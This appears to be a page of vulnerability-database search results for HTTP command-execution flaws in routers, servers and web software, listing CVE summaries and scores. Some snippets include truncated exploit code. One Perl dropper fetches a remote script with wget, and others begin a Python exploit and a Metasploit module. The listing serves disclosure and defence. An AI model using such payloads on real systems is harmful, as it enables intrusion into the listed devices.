Lucene search

59 matches found

Cvelist
added 2020/02/24 3:35 p.m. · 13 views

CVE-2020-4212

IBM Spectrum Protect Plus 10.1.0 and 10.1.5 could allow a remote attacker to execute arbitrary code on the system. By using a specially crafted HTTP command, an attacker could exploit this vulnerability to execute arbitrary command on the system. IBM X-Force ID: 175023...

9.8 CVSS · 9.4 AI score · 0.19739 EPSS
Exploits 0 · References 3
OSV
added 2019/11/26 3:15 p.m. · 2 views

CVE-2019-12489

An issue was discovered on Fastweb Askey RTV1907VW 0.00.81FW200Askey 2018-10-02 18:08:18 devices. By using the usbremove service through an HTTP request, it is possible to inject and execute a command between two & characters in the mount parameter...

9.8 CVSS · 5.8 AI score · 0.11489 EPSS
Exploits 1 · References 2
NVD
added 2019/08/01 1:15 p.m. · 11 views

CVE-2019-14334

An issue was discovered on D-Link 6600-AP, DWL-3600AP, and DWL-8610AP Ax 4.2.0.14 21/03/2019 devices. There is post-authenticated Certificate and RSA Private Key extraction through an insecure sslcert-get.cgi HTTP command...

5.5 CVSS · 5.6 AI score · 0.00032 EPSS
Exploits 3 · References 3
OSV
added 2019/08/01 1:15 p.m. · 2 views

CVE-2019-14334

An issue was discovered on D-Link 6600-AP, DWL-3600AP, and DWL-8610AP Ax 4.2.0.14 21/03/2019 devices. There is post-authenticated Certificate and RSA Private Key extraction through an insecure sslcert-get.cgi HTTP command...

5.5 CVSS · 6.1 AI score
Exploits 0 · References 3
0day.today
added 2019/06/26 12:0 a.m. · 271 views

SAPIDO RB-1732 - Remote Command Execution Exploit

Exploit Title: SAPIDO RB-1732 command line execution Exploit Author: k1nm3n.aotoi Vendor Homepage: http://www.sapido.com.tw/ Software Link: http://www.sapido.com.tw/CH/data/Download/firmware/rb1732/tc/RB-1732TCv2.0.43.bin Version: RB-1732 V2.0.43 Tested on: linux import requests import sys def...

0.2 AI score
Exploits 0
Tenable Nessus
added 2019/05/08 12:0 a.m. · 11 views

Siemens SCALANCE X200 IRT Switches < 5.1.0 HTTP Command Execution

Binary data 720037.prm...

8 CVSS · 7.3 AI score · 0.00324 EPSS
Exploits 0 · References 2
NVD
added 2018/09/15 9:29 p.m. · 9 views

CVE-2018-17066

An issue was discovered on D-Link DIR-816 A2 1.10 B05 devices. An HTTP request parameter is used in command string construction in the handler function of the /goform/form2systime.cgi route. This could lead to command injection via shell metacharacters in the datetime parameter...

10 CVSS · 9.7 AI score · 0.28495 EPSS
Exploits 1 · References 1
Positive Technologies
added 2018/05/08 12:0 a.m. · 2 views

PT-2018-3918 · D Link · D-Link Di-604 +1

Name of the Vulnerable Software and Affected Versions: D-Link DIR-550A versions through v2.10KR D-Link DIR-604M versions through v2.10KR Description: The issue allows a malicious user to forge an HTTP request and inject operating system commands that can be executed on the device with higher...

9 CVSS · 9.1 AI score · 0.01879 EPSS
Exploits 0 · References 3
NVD
added 2018/04/12 9:29 p.m. · 14 views

CVE-2014-8888

The remote administration interface in D-Link DIR-815 devices with firmware before 2.03.B02 allows remote attackers to execute arbitrary commands via vectors related to an "HTTP command injection issue."...

10 CVSS · 9.9 AI score · 0.08081 EPSS
Exploits 0 · References 2
Cvelist
added 2018/04/12 9:0 p.m. · 16 views

CVE-2014-8888

The remote administration interface in D-Link DIR-815 devices with firmware before 2.03.B02 allows remote attackers to execute arbitrary commands via vectors related to an "HTTP command injection issue."...

10 AI score · 0.08081 EPSS
Exploits 0 · References 2
CVE
added 2018/04/12 9:0 p.m. · 51 views

CVE-2014-8888

The CVE-2014-8888 entry maps to a vulnerability in D-Link DIR-815 devices (firmware prior to 2.03.B02) where the remote administration interface is susceptible to an HTTP command injection due to insufficient input validation. Affected component/process: the remote admin web interface; impact per...

10 CVSS · 9.8 AI score · 0.08081 EPSS
Exploits 0 · References 2 · Affected Software 1
myhack58
added 2015/04/01 12:0 a.m. · 83 views

Local File Inclusion (LFI) Vulnerability Detection Tool – Kadimus - vulnerability warning - the black bar safety net

Kadimus is a security tool for detecting local file inclusion (LFI) vulnerabilities in a site. Features: detect all URL parameters; /var/log/auth.log RCE; /proc/self/environ RCE; php://input RCE; data://text RCE; source code leak detection; multi-thread scanning; HTTP command execution vulnerabili...

0.1 AI score
Exploits 0
seebug.org
added 2014/07/01 12:0 a.m. · 18 views

MDG Web Server 4D 3.6 HTTP Command Buffer Overflow Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/7479/info A buffer overflow vulnerability has been reported for MDG Web Server. The vulnerability exists when the web server attempts to process overly long HTTP requests. Specifically, when the web server processes a...

7.1 AI score
Exploits 0
seebug.org
added 2014/07/01 12:0 a.m. · 16 views

InstantCMS 1.6 - Remote PHP Code Execution

No description provided by source. require 'msf/core' class Metasploit3 Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initializeinfo = superupdateinfoinfo, 'Name' = 'InstantCMS 1.6 Remote PHP Code Execution', 'Description' = %q This module exploits an...

7.1 AI score
Exploits 0
Packet Storm
added 2014/06/29 12:0 a.m. · 63 views

Horde Framework Unserialize PHP Code Execution

ported from metasploit by irrlicht june 2014 modify dropper url and run use strict; use warnings; use LWP::UserAgent; use WWW::Mechanize; use MIME::Base64; if !$ARGV0 print "specify full login.php url\n"; exit; my $dropper = 'system"mkdir /tmp/\" \"; cd /tmp/\" \"; wget -O deploy.pl...

7.5 CVSS · 0.1 AI score · 0.8135 EPSS
Exploits 7
OpenVAS
added 2005/11/03 12:0 a.m. · 25 views

Alchemy Eye HTTP Command Execution

Alchemy Eye and Alchemy Network Monitor are network management tools for Microsoft Windows. The product contains a built-in HTTP server for remote monitoring and control. This HTTP server allows arbitrary commands to be run on the server by a remote attacker. SPDX-FileCopyrightText: 2001 HD Moore...

7.5 CVSS · 7.1 AI score · 0.03803 EPSS
Exploits 0 · References 2
Cvelist
added 2005/10/25 4:0 a.m. · 11 views

CVE-2004-2516

Directory traversal vulnerability in myServer 0.7 allows remote attackers to list arbitrary directories via an HTTP GET command with a large number of "./" sequences followed by "../" sequences...

6.9 AI score · 0.10869 EPSS
Exploits 1 · References 7
securityvulns
added 2003/12/15 12:0 a.m. · 36 views

[Full-Disclosure] lftp buffer overflows

lftp buffer overflows --------------------- PROGRAM: lftp VENDOR: Alexander V. Lukyanov et al. HOMEPAGE: http://lftp.yar.ru/ VULNERABLE VERSIONS: 2.3.0, 2.4.9, 2.6.6, 2.6.7, 2.6.8, 2.6.9, probably all versions inbetween IMMUNE VERSIONS: 2.6.10, older versions with my patch applied PROGRAM...

0.2 AI score
Exploits 0
securityvulns
added 2002/04/24 12:0 a.m. · 24 views

LabVIEW Web Server DoS Vulnerability

Title: LabVIEW Web Server DoS Vulnerability Date: 2002-04-22 Vendor: National Instruments Software: LabVIEW Web Server Versions: 5.1.1 - 6.1 Tested env: Windows 98, 2000; Linux. Impact: Malformed HTTP command crashes the LabVIEW Web Server, its LabVIEW application hos...

0.3 AI score
Exploits 0